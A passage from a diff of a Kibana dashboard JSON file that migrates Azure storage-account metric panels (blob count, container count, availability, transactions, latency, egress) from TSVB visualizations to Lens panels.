"use_kibana_indexes": false, - "drop_last_bucket": 1 + "visualization": { + "color": "#009CE0", + "layerId": "d2cfe212-5327-4afa-b09d-4cea0f4abe67", + "layerType": "data", + "maxAccessor": "2fd4f627-1d0e-40a7-a622-e57e790e5117", + "metricAccessor": "7772aa00-2719-4fb3-a52a-732158558669" + } }, - "type": "metrics", - "data": { - "aggs": [], - "searchSource": {} - } - } - } - }, - { - "version": "8.3.0", - "type": "visualization", + "title": "Storage Blob Count", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, "gridData": { "h": 9, "i": "41faed50-ba96-4484-b6dc-71ed3e2d3427", "w": 5, - "x": 19, - "y": 0 + "x": 5, + "y": 5 }, "panelIndex": "41faed50-ba96-4484-b6dc-71ed3e2d3427", + "title": "Storage Blob Count", + "type": "lens", + "version": "8.7.0" + }, + { "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "title": "Storage Blob Count [Azure Metrics]", - "description": "", - "uiState": {}, - "params": { - "axis_formatter": "number", - "axis_min": 0, - "axis_position": "left", - "axis_scale": "normal", - "background_color": null, - "background_color_rules": [ - { - "id": "71978870-32e4-11ea-af9e-d70582a45bda" + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "tsvb_ad_hoc_metrics-*/@timestamp": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "metrics-*", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*" } - ], - "bar_color_rules": [ + }, + "datasourceStates": { + "formBased": { + "layers": { + "b0d96c20-3261-4140-be71-84129244491f": { + "columnOrder": [ + "39df78b2-9658-4a1d-a2b4-7a84e6f13a45", + "cae2423e-1cef-4c5f-af30-c8c57fce42c0X0", + "cae2423e-1cef-4c5f-af30-c8c57fce42c0X1", + "cae2423e-1cef-4c5f-af30-c8c57fce42c0" + ], + "columns": { + "39df78b2-9658-4a1d-a2b4-7a84e6f13a45": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Container Count", + "operationType": "last_value", + "params": { + "format": { + "id": "number" + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "azure.storage_account.container_count.avg" + }, + "cae2423e-1cef-4c5f-af30-c8c57fce42c0": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(azure.storage_account.container_count.avg))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(azure.storage_account.container_count.avg))", + "isFormulaBroken": false + }, + "references": [ + "cae2423e-1cef-4c5f-af30-c8c57fce42c0X1" + ], + "scale": "ratio" + }, + "cae2423e-1cef-4c5f-af30-c8c57fce42c0X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.container_count.avg: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(azure.storage_account.container_count.avg))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "azure.storage_account.container_count.avg" + }, + "cae2423e-1cef-4c5f-af30-c8c57fce42c0X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(azure.storage_account.container_count.avg))", + "operationType": "overall_max", + "references": [ + "cae2423e-1cef-4c5f-af30-c8c57fce42c0X0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [ { - "id": "f11cfd90-32e5-11ea-af9e-d70582a45bda" + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "indexpattern-datasource-layer-b0d96c20-3261-4140-be71-84129244491f", + "type": "index-pattern" } ], - "drilldown_url": "", - "filter": { + "query": { "language": "kuery", "query": "" }, - "gauge_color_rules": [ - { - "id": "9c09ed50-32e4-11ea-af9e-d70582a45bda" + "visualization": { + "color": "#68BC00", + "layerId": "b0d96c20-3261-4140-be71-84129244491f", + "layerType": "data", + "maxAccessor": "cae2423e-1cef-4c5f-af30-c8c57fce42c0", + "metricAccessor": "39df78b2-9658-4a1d-a2b4-7a84e6f13a45" + } + }, + "title": "Storage Container Count", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "34aa5ce7-4f4b-4712-836f-3765e7c3fb3f", + "w": 5, + "x": 10, + "y": 5 + }, + "panelIndex": "34aa5ce7-4f4b-4712-836f-3765e7c3fb3f", + "title": "Storage Container Count", + "type": "lens", + "version": "8.7.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "tsvb_ad_hoc_metrics-*/@timestamp": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "metrics-*", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*" } - ], - "gauge_inner_color": null, - "gauge_inner_width": "6", - "gauge_style": "circle", - "gauge_width": "10", - "hide_last_value_indicator": true, - "id": "61fb4190-32e4-11ea-b9f8-4d0b340ad993", - "index_pattern": "metrics-*", - "interval": "60m", - "isModelInvalid": false, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "rgba(0,156,224,1)", - "fill": "1.2", - "filter": { - "language": "kuery", - "query": "" - }, - "formatter": "'0'", - "id": "61fb4191-32e4-11ea-b9f8-4d0b340ad993", - "label": "Blob Count", - "line_width": 2, - "metrics": [ - { - "field": "azure.storage_account.blob_count.avg", - "id": "61fb4192-32e4-11ea-b9f8-4d0b340ad993", - "type": "avg" + }, + "datasourceStates": { + "formBased": { + "layers": { + "094e2c52-4d02-4bf5-8971-1d17db5677da": { + "columnOrder": [ + "f8f4ab4a-0a11-4da5-8c51-289a226c9bf4", + "da185728-bcee-4457-82d3-1520127e3664" + ], + "columns": { + "da185728-bcee-4457-82d3-1520127e3664": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.availability.avg: *" + }, + "isBucketed": false, + "label": "Availability", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": " %" + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "azure.storage_account.availability.avg" + }, + "f8f4ab4a-0a11-4da5-8c51-289a226c9bf4": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} } - ], - "point_size": 0, - "separate_axis": 0, - "split_color_mode": "gradient", - "split_mode": "everything", - "stacked": "none", - "terms_field": "azure.resource.name", - "terms_order_by": "61fb4192-32e4-11ea-b9f8-4d0b340ad993", - "type": "timeseries", - "value_template": "{{value}}" + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [ + { + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "indexpattern-datasource-layer-094e2c52-4d02-4bf5-8971-1d17db5677da", + "type": "index-pattern" } ], - "show_grid": 1, - "show_legend": 1, - "time_field": "@timestamp", - "type": "gauge", - "use_kibana_indexes": false, - "drop_last_bucket": 1 + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0.6, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "da185728-bcee-4457-82d3-1520127e3664" + ], + "layerId": "094e2c52-4d02-4bf5-8971-1d17db5677da", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "area", + "xAccessor": "f8f4ab4a-0a11-4da5-8c51-289a226c9bf4", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(22,165,165,1)", + "forAccessor": "da185728-bcee-4457-82d3-1520127e3664" + } + ] + } + ], + "legend": { + "isVisible": false, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear" + } }, - "type": "metrics", - "data": { - "aggs": [], - "searchSource": {} - } - } - } - }, - { - "version": "8.3.0", - "type": "visualization", + "title": "Storage Availability", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, "gridData": { "h": 9, - "i": "1d623c03-4d02-4a81-b91e-49e82e112016", - "w": 19, - "x": 29, - "y": 0 + "i": "a9456b9b-efa6-410d-a56c-4b66aa8c499e", + "w": 14, + "x": 15, + "y": 5 }, - "panelIndex": "1d623c03-4d02-4a81-b91e-49e82e112016", + "panelIndex": "a9456b9b-efa6-410d-a56c-4b66aa8c499e", + "title": "Availability", + "type": "lens", + "version": "8.7.0" + }, + { "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "title": "Storage Transactions [Azure Metrics]", - "description": "", - "uiState": {}, - "params": { - "axis_formatter": "number", - "axis_min": 0, - "axis_position": "left", - "axis_scale": "normal", - "filter": { - "language": "kuery", - "query": "" + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "tsvb_ad_hoc_metrics-*/@timestamp": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "metrics-*", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*" + } }, - "id": "c9fd65d0-32e8-11ea-84f4-e9593f8ba8f6", - "index_pattern": "metrics-*", - "interval": "5m", - "isModelInvalid": false, - "series": [ - { - "axis_position": "right", - "chart_type": "bar", - "color": "#3185FC", - "fill": 0.5, - "formatter": "number", - "id": "c9fd8ce0-32e8-11ea-84f4-e9593f8ba8f6", - "label": "avg(azure.storage_account.transactions.total)", - "line_width": "1", - "metrics": [ - { - "field": "azure.storage_account.transactions.total", - "id": "c9fd8ce1-32e8-11ea-84f4-e9593f8ba8f6", - "type": "max" + "datasourceStates": { + "formBased": { + "layers": { + "96b37a76-3db8-4552-ae26-45004aa4e892": { + "columnOrder": [ + "d4d768f9-effd-43f3-b30a-e6ad938d3483", + "6297e28c-ea13-4b49-af52-f1b78a6e3abc", + "2092a1f3-dc5b-4462-9551-c6de4a2a7b78" + ], + "columns": { + "2092a1f3-dc5b-4462-9551-c6de4a2a7b78": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "avg(azure.storage_account.transactions.total)", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "azure.storage_account.transactions.total" + }, + "6297e28c-ea13-4b49-af52-f1b78a6e3abc": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.dimensions.response_type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2092a1f3-dc5b-4462-9551-c6de4a2a7b78", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.dimensions.response_type" + }, + "d4d768f9-effd-43f3-b30a-e6ad938d3483": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} } - ], - "point_size": 0, - "separate_axis": 0, - "split_color_mode": "rainbow", - "split_mode": "terms", - "stacked": "none", - "terms_field": "azure.dimensions.response_type", - "terms_order_by": "c9fd8ce1-32e8-11ea-84f4-e9593f8ba8f6", - "type": "timeseries", - "value_template": "{{value}}" + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [ + { + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "indexpattern-datasource-layer-96b37a76-3db8-4552-ae26-45004aa4e892", + "type": "index-pattern" } ], - "show_grid": 1, - "show_legend": 1, - "time_field": "@timestamp", - "type": "timeseries", - "use_kibana_indexes": false, - "drop_last_bucket": 1 + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0.5, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "2092a1f3-dc5b-4462-9551-c6de4a2a7b78" + ], + "layerId": "96b37a76-3db8-4552-ae26-45004aa4e892", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "bar", + "splitAccessor": "6297e28c-ea13-4b49-af52-f1b78a6e3abc", + "xAccessor": "d4d768f9-effd-43f3-b30a-e6ad938d3483", + "yConfig": [ + { + "axisMode": "left", + "color": "#3185FC", + "forAccessor": "2092a1f3-dc5b-4462-9551-c6de4a2a7b78" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear" + } }, - "type": "metrics", - "data": { - "aggs": [], - "searchSource": {} - } - } + "title": "Storage Transactions", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false }, - "title": "Transactions" - }, - { - "version": "8.3.0", - "type": "visualization", "gridData": { - "h": 15, - "i": "ff6441f8-d66d-4399-bae5-25d3d861b299", - "w": 9, - "x": 0, + "h": 9, + "i": "1d623c03-4d02-4a81-b91e-49e82e112016", + "w": 19, + "x": 29, "y": 5 }, - "panelIndex": "ff6441f8-d66d-4399-bae5-25d3d861b299", + "panelIndex": "1d623c03-4d02-4a81-b91e-49e82e112016", + "title": "Transactions", + "type": "lens", + "version": "8.7.0" + }, + { "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "title": "Storage Filters [Azure Metrics]", - "description": "", - "uiState": {}, - "params": { - "controls": [ - { - "fieldName": "azure.subscription_id", - "id": "1549397251041", - "indexPatternRefName": "control_0_index_pattern", - "label": "Subscription", - "options": { - "dynamicOptions": true, - "multiselect": false, - "order": "desc", - "size": 5, - "type": "terms" - }, - "parent": "", - "type": "list" - }, - { - "fieldName": "azure.resource.group", - "id": "1549512142947", - "indexPatternRefName": "control_1_index_pattern", - "label": "Resource Group", - "options": { - "dynamicOptions": true, - "multiselect": true, - "order": "desc", - "size": 5, - "type": "terms" - }, - "parent": "", - "type": "list" + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "tsvb_ad_hoc_metrics-*/@timestamp": { + "allowNoIndex": true, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "metrics-*", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*" + } + }, + "datasourceStates": { + "formBased": { + "layers": { + "779215db-6202-4568-89a9-46601c8c2fb4": { + "columnOrder": [ + "b03e8e6d-ed51-421f-8eb3-62191d2045ce", + "69665708-1c47-435e-b185-3ed5a8f59cfe", + "1d0a1f41-5061-414a-8e99-aa5d192a6525" + ], + "columns": { + "1d0a1f41-5061-414a-8e99-aa5d192a6525": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.success_server_latency.avg: *" + }, + "isBucketed": false, + "label": "SuccessServerLatency (ms)", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": " ms" + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "azure.storage_account.success_server_latency.avg" + }, + "69665708-1c47-435e-b185-3ed5a8f59cfe": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.dimensions.api_name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "1d0a1f41-5061-414a-8e99-aa5d192a6525", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.dimensions.api_name" + }, + "b03e8e6d-ed51-421f-8eb3-62191d2045ce": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [ { - "fieldName": "azure.resource.name", - "id": "1578578146383", - "indexPatternRefName": "control_2_index_pattern", - "label": "Resource Name", - "options": { - "dynamicOptions": true, - "multiselect": true, - "order": "desc", - "size": 5, - "type": "terms" - }, - "parent": "", - "type": "list" + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "indexpattern-datasource-layer-779215db-6202-4568-89a9-46601c8c2fb4", + "type": "index-pattern" } ], - "pinFilters": false, - "updateFiltersOnChange": true, - "useTimeFilter": false - }, - "type": "input_control_vis", - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0.5, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "1d0a1f41-5061-414a-8e99-aa5d192a6525" + ], + "layerId": "779215db-6202-4568-89a9-46601c8c2fb4", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "bar", + "splitAccessor": "69665708-1c47-435e-b185-3ed5a8f59cfe", + "xAccessor": "b03e8e6d-ed51-421f-8eb3-62191d2045ce", + "yConfig": [ + { + "axisMode": "left", + "color": "#3185FC", + "forAccessor": "1d0a1f41-5061-414a-8e99-aa5d192a6525" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear" } - } - } - } - }, - { - "version": "8.3.0", - "type": "visualization", + }, + "title": "Storage Success Server Latency", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, "gridData": { "h": 15, "i": "87066244-7840-4555-9d12-026d64977f1a", - "w": 20, - "x": 9, - "y": 9 + "w": 24, + "x": 0, + "y": 14 }, "panelIndex": "87066244-7840-4555-9d12-026d64977f1a", + "title": "Success Server Latency", + "type": "lens", + "version": "8.7.0" + }, + { "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "title": "Storage Success Server Latency [Azure Metrics]", - "description": "", - "uiState": {}, - "params": { - "axis_formatter": "number", - "axis_min": 0, - "axis_position": "left", - "axis_scale": "normal", - "filter": { - "language": "kuery", - "query": "" + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "tsvb_ad_hoc_metrics-*/@timestamp": { + "allowNoIndex": true, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "metrics-*", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*" + } }, - "id": "e9a40230-32e9-11ea-bda2-69435df36a5c", - "index_pattern": "metrics-*", - "interval": "5m", - "isModelInvalid": false, - "series": [ - { - "axis_position": "right", - "chart_type": "bar", - "color": "#3185FC", - "fill": 0.5, - "formatter": "number", - "id": "e9a40231-32e9-11ea-bda2-69435df36a5c", - "label": "SuccessServerLatency (ms)", - "line_width": "1", - "metrics": [ - { - "field": "azure.storage_account.success_server_latency.avg", - "id": "e9a40232-32e9-11ea-bda2-69435df36a5c", - "type": "avg" + "datasourceStates": { + "formBased": { + "layers": { + "75e28cd0-af63-4d76-bc48-27ab36ecee8f": { + "columnOrder": [ + "e38795c4-e485-443d-a00f-5d1bf2ef7220", + "9825f6c6-fbdc-478d-a02e-e3f67ccd16ff", + "9e9be992-df58-4b34-ad97-ba789b63accd" + ], + "columns": { + "9825f6c6-fbdc-478d-a02e-e3f67ccd16ff": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.dimensions.api_name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "9e9be992-df58-4b34-ad97-ba789b63accd", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.dimensions.api_name" + }, + "9e9be992-df58-4b34-ad97-ba789b63accd": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.success_e2elatency.avg: *" + }, + "isBucketed": false, + "label": "Success E2E Latency (ms)", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": " ms" + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "azure.storage_account.success_e2elatency.avg" + }, + "e38795c4-e485-443d-a00f-5d1bf2ef7220": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} } - ], - "point_size": 0, - "separate_axis": 0, - "split_color_mode": "rainbow", - "split_mode": "terms", - "stacked": "none", - "terms_field": "azure.dimensions.api_name", - "terms_order_by": "e9a40232-32e9-11ea-bda2-69435df36a5c", - "type": "timeseries", - "value_template": "{{value}} ms" + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [ + { + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "indexpattern-datasource-layer-75e28cd0-af63-4d76-bc48-27ab36ecee8f", + "type": "index-pattern" } ], - "show_grid": 1, - "show_legend": 1, - "time_field": "@timestamp", - "type": "timeseries", - "use_kibana_indexes": false, - "drop_last_bucket": 1 + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0.5, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "9e9be992-df58-4b34-ad97-ba789b63accd" + ], + "layerId": "75e28cd0-af63-4d76-bc48-27ab36ecee8f", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "bar", + "splitAccessor": "9825f6c6-fbdc-478d-a02e-e3f67ccd16ff", + "xAccessor": "e38795c4-e485-443d-a00f-5d1bf2ef7220", + "yConfig": [ + { + "axisMode": "left", + "color": "#3185FC", + "forAccessor": "9e9be992-df58-4b34-ad97-ba789b63accd" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear" + } }, - "type": "metrics", - "data": { - "aggs": [], - "searchSource": {} - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false }, - "title": "Success Server Latency" - }, - { - "version": "8.3.0", - "type": "visualization", "gridData": { "h": 15, "i": "756da375-e6a2-4668-af43-0cd294878254", - "w": 19, - "x": 29, - "y": 9 + "w": 24, + "x": 24, + "y": 14 }, "panelIndex": "756da375-e6a2-4668-af43-0cd294878254", - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "title": "Storage Success E2E Latency [Azure Metrics]", - "description": "", - "uiState": {}, - "params": { - "axis_formatter": "number", - "axis_min": 0, - "axis_position": "left", - "axis_scale": "normal", - "filter": { - "language": "kuery", - "query": "" - }, - "id": "da4459b0-32ea-11ea-be35-cb10be813609", - "index_pattern": "metrics-*", - "interval": "5m", - "isModelInvalid": false, - "series": [ - { - "axis_position": "right", - "chart_type": "bar", - "color": "#3185FC", - "fill": 0.5, - "formatter": "number", - "id": "da4459b1-32ea-11ea-be35-cb10be813609", - "label": "Success E2E Latency (ms)", - "line_width": "1", - "metrics": [ - { - "field": "azure.storage_account.success_e2elatency.avg", - "id": "da4459b2-32ea-11ea-be35-cb10be813609", - "type": "avg" - } - ], - "point_size": 0, - "separate_axis": 0, - "split_color_mode": "rainbow", - "split_mode": "terms", - "stacked": "none", - "terms_field": "azure.dimensions.api_name", - "terms_order_by": "da4459b2-32ea-11ea-be35-cb10be813609", - "type": "timeseries", - "value_template": "{{value}} ms" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "@timestamp", - "type": "timeseries", - "use_kibana_indexes": false, - "drop_last_bucket": 1 - }, - "type": "metrics", - "data": { - "aggs": [], - "searchSource": {} - } - } - }, - "title": "Success E2E Latency" + "title": "Success E2E Latency", + "type": "lens", + "version": "8.7.0" }, { - "version": "8.3.0", - "type": "visualization", - "gridData": { - "h": 9, - "i": "34aa5ce7-4f4b-4712-836f-3765e7c3fb3f", - "w": 5, - "x": 24, - "y": 0 - }, - "panelIndex": "34aa5ce7-4f4b-4712-836f-3765e7c3fb3f", "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "title": "Storage Container Count [Azure Metrics]", - "description": "", - "uiState": {}, - "params": { - "axis_formatter": "number", - "axis_min": 0, - "axis_position": "left", - "axis_scale": "normal", - "background_color": null, - "background_color_rules": [ - { - "id": "71978870-32e4-11ea-af9e-d70582a45bda" + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "tsvb_ad_hoc_metrics-*/@timestamp": { + "allowNoIndex": true, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "metrics-*", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*" } - ], - "bar_color_rules": [ + }, + "datasourceStates": { + "formBased": { + "layers": { + "a88483ec-4907-4b37-932e-c8f321dd4e0f": { + "columnOrder": [ + "7d007119-a64e-4bb9-b766-c98e88020f08", + "fd2e7314-5a94-49b1-95b1-c0459f6399b0", + "2145e43c-e9ba-4cb2-9d0f-988e3f3febcd" + ], + "columns": { + "2145e43c-e9ba-4cb2-9d0f-988e3f3febcd": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Storage Accounts Egress Total", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes" + } + }, + "scale": "ratio", + "sourceField": "azure.storage_account.egress.total" + }, + "7d007119-a64e-4bb9-b766-c98e88020f08": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "fd2e7314-5a94-49b1-95b1-c0459f6399b0": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.dimensions.api_name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2145e43c-e9ba-4cb2-9d0f-988e3f3febcd", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.dimensions.api_name" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [ { - "id": "f11cfd90-32e5-11ea-af9e-d70582a45bda" + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "indexpattern-datasource-layer-a88483ec-4907-4b37-932e-c8f321dd4e0f", + "type": "index-pattern" } ], - "drilldown_url": "", - "filter": { + "query": { "language": "kuery", "query": "" }, - "gauge_color_rules": [ - { - "id": "9c09ed50-32e4-11ea-af9e-d70582a45bda" - } - ], - "gauge_inner_color": null, - "gauge_inner_width": "6", - "gauge_style": 